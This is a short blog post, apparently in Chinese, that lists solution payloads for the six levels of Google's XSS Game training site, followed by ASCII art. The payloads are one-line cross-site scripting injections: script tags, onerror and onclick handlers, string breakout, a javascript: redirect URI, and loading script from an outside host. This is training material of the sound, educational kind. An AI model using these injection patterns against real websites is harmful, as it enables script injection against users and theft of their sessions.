Featured image of post Google XSS Game answer

Google XSS Game answer

Game platform

documentation

 • Lavel1: <script>alert();</script>
 • Lavel2: <img src='x' onerror='alert();' /> | <buttin onclick='javascript:alert();'>XD</button>
 • Lavel3: #9' onerror='alert()' | #9' onclick='alert()'
 • Lavel4: ');alert('
 • Lavel5: https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert()
 • Lavel6: https://xss-game.appspot.com/level6/frame#Https://www.google.com/jsapi?callback=alert | https://xss-game.appspot.com/level6/frame#Https://www.toolman.xyz/a.js
                             -oooo:-                            
                            omhsoosho`                           
                            Ndo:``:oh-                           
                            dms+--+ym:                           
                            -ymhohdh+`                           
                             `N/`.s.                            
                             +: +                             
                             -- :                             
                             -- o                             
                             .. +                             
                             :: s    ..`                       
                        .:sssso. -- +   :syhhyo`                      
                ..::::.    `odhhyyhdd. :: s  .mhhyhhdh.    -:...`               
                /dhhhhhhs   .odddhyhdddh+y: my-syhdhhyhhddy/`  .odhyyhh:               
               yNdhyyoyhmo+::+ms/+++//++/odm: NNmNd+///+++/+ody::omhyssyhdm-              
              -sddyyyyyyyoommmmmmdhyyyyyyhddd: `ddmdmdhyssyyhhmmNNNNdhyyyyyhmo-`             
            ``-omdyyyssys///shdddddddddmmdddhyy-``yhddddhhhhhdmmmmmmdd/oyssyyyyhmhss-`           
           `:ohhdmddhhyyyyyshddddhhyyyyyhddhhyo:-...--shhyysssyyhhdhhhddyyysyyyhdddmNNmyo.          
          /hNNmmd/:o+/////:`/osyhhyyys+syyhhyysysooossyyyyyooyyyyyyysyy+./oooooos/:ydNNmNmo.         
          +dNmmmmmhoo+///////oossshhyyyyyyyyssoossoosoosssyyyyyyyhsoyyyys/:-..--:/+sdddmmmNMy         
         `hNmmdmmdmddddhhhyhysso+.oyssssso-./o:-/+oo++oo--osoooooo..oyyhyyyyyyhhhyhdddmmdmNNN         
         `yNmNNhhdmdddhhhyyyyyyys:-......`./+++/:o++oo++/-````..::/+sysysyyyhsshhhydddmmmNNNN         
          sMNNNNNNmmdmdhhhhyyyyyyhhssssoo+oo/+//:/+//+:++++ooosyooyssosyyhhyhsshdhdmmNmNmmMMN         
          -NNNNNNhmNmdmmmdddddmhhhyyyyssys///+/:://////o+osoo+osoossosyhhdddh+omddmNNmmNmNMMN         
          oMNNNNNNNNdydNmmmmmdhydhhsoooodhydhsshys+soyooooosssyhyhymdhdhyddmmmdmNNNNNNmNNNMMM         
          yMMNNNMmmNdmmNNNNNNmh/sysyysyhyddmhhyhyhhddyyyhmddhhdmdddmmmdmmmmNNmmmNmNNNNmMNMMMM         
         .dMMNNMMNNNmNNNNNNmmNNhsddddNNdmhdmddyyhdhdhdddhdmhhdddhmddmmmNNNNNNNNNNNNNNNNMNMMMM         
         :NMMMNMMNMNhhmNNNNmdmNNmhddmdNmmmmmmddddNmdhdhddddmddmmmmmmNdNmdmmNNNmNNNNNdmMMMMMMM         
         -mMMMMMNNmNNmNNNNNNNNNNNdmmNmNmNmNmmNNmmNNdhddmmmmNmhhhyohNMNMNmmmmNdmNNMMMNNMMMMMMM         
         .dMMMMMMNNNMMMMMNNNNNMNmmmNNNmmmmNNdddmmNNNmmdNNmNNNmmNNNNNNNNNNNNNNNmNNNNNmNMMMMMMM         
         :NMMMMMMMMMMMMMMMNmmNMNNNNNNNmmNmNNNNmdmNNNNNNNmNNdmNNMMNMmNNNNNNMMNdmNNNMNmmMMMMMMM         
         :NNMMMMMMMMMMMMMMMMNNMNNMNNNMMMNNNNNNmNmdmmmNNNNNNmmNNNNNNNNNNMNNMMMNNNNMMNmMMMMNNMN         
         :NMMMNNMMMMMMMMMMMMMNNMMMMNMMMNmNNMNNNNNmhNMNNMNNNMMNMMMMMNNMMNNNMNMMMMNMMNNMMNMNMMM         
         `hMMMNdMNNMNNNNNMMNNNNMMMMMMMMNmNMMMMNNNNNNNdmmmMNMMMMMMNNMMNmdNMMNMNNNNMNmmNMNMMMMN         
          yMMMMNMMNMNmmNNNMNmddmMMNNNMNNNNNMMNNNNMNNNNNNNmNNNNNNNNNNNNNddNdmdmmNNMNNdMMMMMMMN         
          yMMMMNMNMMNNMMNNNNmdmmNMNNdhmMNNNNNNmNMMddddmNNNmNNMMNmNmmmmmNNmmmmNMMMMMMNNNMMMMMN         
          yNNNMMNNMMMMMMNNNNNMmmdNNNNNNNNNNNNmNNNNNmNmmNNNNNNNNNNNmNmNNNNNNNNNNNNNMMMNNMMMMMy         
          +MMMMMMMMMMMNNNNMMMNNNNmNNNMNMNNMNNmhdNNNNNmNNNmmNNNNNNNNNNNMMNNmNNNNNMNMNMMMMMMMN:         
          NMMMMNMMMMMMMNNNNNNdNMNNNNNNmNNNNNNNNNmmhNNNNmdNNNNNNNNNMMNNMNNNNNNNNNMMMMNNMMMNs`         
          -sdmNMNNMMMMMNNNNmmmmNNNMNmNMNNNNNNNMNmNNNNNNmmmdmNNNMNmmmmNMNNMNMmmNNMMMNMNmd+-`          
           `.ohNNMMNMMNMNNmdmNNNNNNmNMNNMNNNNmNNNmmmNmNMMNNMNNMMNNNNNNNNNNMMMMMMMNNho.`           
             :+hdNNNNNNNNNNNNNNmNNNNNNNMNNNmNNNNmMmmmNNNMNNNNNNNNMNNMMMMMNNmdds/-             
               `--:+shddmmNmmmmNNNNMNNNMNNNNNNNNNNMMNMMMNNNmNNNMNNNNdh++/-.`               
                   `--++osdddddddysNmmhshmmmmmNmddddddho/:++/---                   
                          `-.-. .------.                 

  

以上解法提供參考,有其他方式歡迎在留言處分享,謝謝

 

Licensed under CC BY-NC-SA 4.0